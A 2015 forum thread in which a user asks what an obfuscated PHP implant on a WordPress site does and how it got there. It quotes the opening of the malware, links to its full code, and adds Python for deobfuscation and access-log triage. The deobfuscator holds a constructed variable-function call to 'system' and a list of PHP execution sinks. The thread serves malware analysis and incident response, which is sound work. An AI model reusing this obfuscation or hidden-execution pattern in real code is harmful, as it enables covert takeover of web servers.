Malware
savinov_ao, 2015-08-17 17:47:13

What kind of virus attacked the WordPress site, and how did it get onto the hosting?

Good afternoon! A friend asked me to look into his sites. In the root of the site there are the files admin.php, ajax.php, menu.php, themes.php, file/title.php, javascript.php, etc. (33 files in total), all the same size, 23148 bytes. The file begins with:

<?php ${"\x47\x4c\x4f\x42\x41LS"}["ki\x72g\x6c\x68\x72d"]="\x69\x70";${"\x47\x4c\x4fB\x41L\x53"}["f\x6aze\x76k"]="\x72e\x66\x65\x72\x65r";${"\x47\x4cO\x42A\x4cS"}["\x78\x6a\x63\x63\x72\x78fv\x66\x6e\x79"]="\x66\x75\x6e\x63";${"\x47\x4cOB\x41\x4c\x53"}["\x79t\x6bo\x6c\x6ej"]="\x68";${"GLO\x42AL\x53"}["\x70\x74\x6f\x65\x78\x75\x7a\x76\x6apl\x6c"]="h\x65\x61d\x65\x72s";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x69\x68\x63\x6a\x79p\x6d"]="re\x73";${"G\x4cO\x42A\x4c\x53"}["\x70u\x6f\x6e\x6fm"]="h\x5f\x64\x65\x74\x65c\x74e\x64";${"\x47\x4cO\x42A\x4cS"}["\x7a\x66e\x69\x67\x76\x67\x6ar"]="\x64a\x74\x61"

Decoded view: www.unphp.net/decode/5e4a984491b820e1363e92c0091f2f49
VirusTotal result: https://www.virustotal.com/en/file/fd82de4bb7b5641...
Full original virus code: https://dl.dropboxusercontent.com/u/22105529/db.php
Questions:
1. What is the functionality of the virus? I did not find any occurrence of eval, backticks ` or system; how else can system commands be executed in PHP?
2. How could it have gotten onto the hosting? A friend swears that the FTP passwords were not stored on his computer. I would like to find the loophole so that the infection does not recur.
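An added example (my own Python, not code from the post, the answer, or the malware itself) that shows what the opening of the posted file is doing and why a search for eval/system finds nothing. It decodes the \x escapes in the double-quoted literals, collects the ${"GLOBALS"}["alias"]="name" definitions that the fragment consists of, and rewrites every ${${"GLOBALS"}["alias"]} back to the plain variable it stands for. The four alias definitions in the sample are the ones visible in the post; the two statements that use them are constructed by me to show the pattern this obfuscator uses and are not taken from the posted file. The point they illustrate is a PHP language fact: $name(...) calls whatever function name the string in $name holds, so the sink name only exists after decoding.

```python
import re

# Constructed sample. The four alias definitions are the ones at the start of
# the posted file (spaces that extraction inserted inside \x escapes removed).
# The last two statements are NOT from the posted file: they are constructed
# to show how this obfuscator uses the aliases ($func="system"; $func($data);).
SAMPLE = (
    r'<?php ${"\x47\x4c\x4f\x42\x41LS"}["ki\x72g\x6c\x68\x72d"]="\x69\x70";'
    r'${"\x47\x4c\x4fB\x41L\x53"}["f\x6aze\x76k"]="\x72e\x66\x65\x72\x65r";'
    r'${"\x47\x4cO\x42A\x4cS"}["\x78\x6a\x63\x63\x72\x78fv\x66\x6e\x79"]="\x66\x75\x6e\x63";'
    r'${"\x47\x4cO\x42A\x4cS"}["\x7a\x66e\x69\x67\x76\x67\x6ar"]="\x64a\x74\x61";'
    r'${${"\x47\x4cOB\x41\x4c\x53"}["\x78\x6a\x63\x63\x72\x78fv\x66\x6e\x79"]}="\x73\x79s\x74em";'
    r'${${"GLO\x42AL\x53"}["\x78\x6a\x63\x63\x72\x78fv\x66\x6e\x79"]}'
    r'(${${"GLO\x42AL\x53"}["\x7a\x66e\x69\x67\x76\x67\x6ar"]});'
)

# Escape sequences PHP honours inside a double-quoted string.
PHP_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\"$])')
SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b', 'f': '\f',
          '\\': '\\', '"': '"', '$': '$'}
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')
ALIAS_DEF = re.compile(r'(?<!\$\{)\$\{"GLOBALS"\}\["([^"]*)"\]="([^"]*)";')
ALIAS_USE = re.compile(r'\$\{\$\{"GLOBALS"\}\["([^"]*)"\]\}')

# Functions through which PHP can run code or commands; preg_replace only via
# the /e modifier (PHP 5), create_function only up to PHP 7.4.
SINKS = ("eval", "assert", "system", "exec", "shell_exec", "passthru", "popen",
         "proc_open", "pcntl_exec", "create_function", "call_user_func",
         "call_user_func_array", "preg_replace")


def decode_php_string(body: str) -> str:
    """Decode the escape sequences of one PHP double-quoted string body."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == 'x':
            return chr(int(esc[1:], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8))
        return SIMPLE[esc]
    return PHP_ESCAPE.sub(repl, body)


def decode_literals(src: str) -> str:
    """Replace every double-quoted literal in the source by its decoded form."""
    def repl(m):
        s = decode_php_string(m.group(1)).replace('\\', '\\\\').replace('"', '\\"')
        return '"' + s + '"'
    return DQ_STRING.sub(repl, src)


def deobfuscate(src: str):
    """Return (alias table, source with aliases resolved to real variable names)."""
    decoded = decode_literals(src)
    aliases = dict(ALIAS_DEF.findall(decoded))

    def use(m):
        name = aliases.get(m.group(1))
        return '$' + name if name else m.group(0)   # unknown alias: leave as is

    resolved = ALIAS_USE.sub(use, decoded)
    resolved = ALIAS_DEF.sub('', resolved)          # definitions are now redundant
    return aliases, resolved


def find_execution_paths(php: str):
    """Names of known sinks present as tokens, plus every variable-function call."""
    hits = [name for name in SINKS if re.search(r'\b' + name + r'\b', php)]
    for m in re.finditer(r'(\$\w+)\s*\(', php):     # $name(...) calls the string in $name
        hits.append("variable-function " + m.group(1))
    return hits


if __name__ == "__main__":
    table, clean = deobfuscate(SAMPLE)
    print("aliases:", table)
    print("resolved:", clean)
    print("sinks in raw file:", find_execution_paths(SAMPLE))
    print("sinks after decoding:", find_execution_paths(clean))
```

On the raw sample the sink scan returns nothing, which is exactly the situation in the question; after decoding the same code reads $func="system";$func($data); and both the sink name and the variable-function call are visible. For the full 23148-byte file the same two passes get you to readable variable names; what remains is ordinary PHP that you read by hand, and the unphp.net link in the post shows that output.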


2 answer(s)
D', 2015-08-17
@savinov_ao

1) No one is going to make sense of the obfuscated code, and it doesn't matter what is in there. 99% it redirects mobile users, shows everyone else some junk, etc.
2) WP is a big hole. If you do not update daily and do not monitor server logs in real time, then sooner or later someone will crawl in. You chose WP? 99% they will break in and put their junk on the site.
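An added example (my own Python, not from the question or the answer above) of the log check that actually answers the second question: take the first request ever made to each of the dropped files and look at what the same client did on the site before that moment, because the implant had to exist by the time it was first requested, and the request that created it usually sits shortly before. The file names are the ones from the post; the log lines are constructed by me in Apache combined format with documentation IP addresses and sketch one common sequence (a login followed by a POST, then a hit on the new file). They are not the site's real logs.

```python
import re
from datetime import datetime
from typing import Dict, List, NamedTuple, Set

# Names from the post; the real site root held 33 such files.
DROPPED: Set[str] = {"/admin.php", "/ajax.php", "/menu.php", "/themes.php",
                     "/file/title.php", "/javascript.php"}

# Constructed Apache combined-log lines, not the site's real logs. The client
# 203.0.113.7 logs in, POSTs to the theme editor, then fetches /admin.php.
LOG = """\
203.0.113.7 - - [16/Aug/2015:03:12:01 +0300] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Aug/2015:03:12:05 +0300] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Aug/2015:03:12:09 +0300] "GET /wp-admin/theme-editor.php?file=header.php HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Aug/2015:03:12:20 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Aug/2015:03:12:31 +0300] "GET /admin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.20 - - [16/Aug/2015:09:40:00 +0300] "GET /admin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (iPhone)"
192.0.2.55 - - [16/Aug/2015:10:01:00 +0300] "GET /wp-content/uploads/2015/08/pic.jpg HTTP/1.1" 200 40000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


class Hit(NamedTuple):
    ip: str
    ts: datetime
    method: str
    path: str
    status: int
    ua: str


def parse_log(text: str) -> List[Hit]:
    """Parse combined-format lines into Hits sorted by time; other formats are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits.append(Hit(m['ip'],
                        datetime.strptime(m['ts'], "%d/%b/%Y:%H:%M:%S %z"),
                        m['method'],
                        m['target'].split('?', 1)[0],   # drop the query string
                        int(m['status']),
                        m['ua']))
    return sorted(hits, key=lambda h: h.ts)


def first_requests(hits: List[Hit], dropped: Set[str]) -> Dict[str, Hit]:
    """Earliest request for each dropped file: the implant existed by then."""
    first: Dict[str, Hit] = {}
    for h in hits:
        if h.path in dropped and h.path not in first:
            first[h.path] = h
    return first


def requests_before(hits: List[Hit], ip: str, when: datetime) -> List[Hit]:
    """Everything the same client did before its first hit on the implant."""
    return [h for h in hits if h.ip == ip and h.ts < when]


def triage(text: str, dropped: Set[str]) -> Dict[str, dict]:
    """Per dropped file: who first requested it, and that client's earlier POSTs."""
    hits = parse_log(text)
    report = {}
    for path, h in first_requests(hits, dropped).items():
        prior = requests_before(hits, h.ip, h.ts)
        report[path] = {"first_seen": h.ts, "ip": h.ip, "prior_count": len(prior),
                        "prior_posts": [p.path for p in prior if p.method == "POST"]}
    return report


if __name__ == "__main__":
    for path, info in triage(LOG, DROPPED).items():
        print(path, "first requested", info["first_seen"], "by", info["ip"])
        print("  earlier POSTs from that client:", info["prior_posts"])
```

Run it over the real access log (all rotated files, not just the current one) with the full list of 33 file names. If the first request to an implant is not preceded by anything from that client, the files were more likely written through another channel (FTP/SFTP, a cron job, another site on the same hosting account), so the FTP log and the ctime of the 33 identical 23148-byte files are the next things to look at; the files are easy to enumerate precisely because they all have that size.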
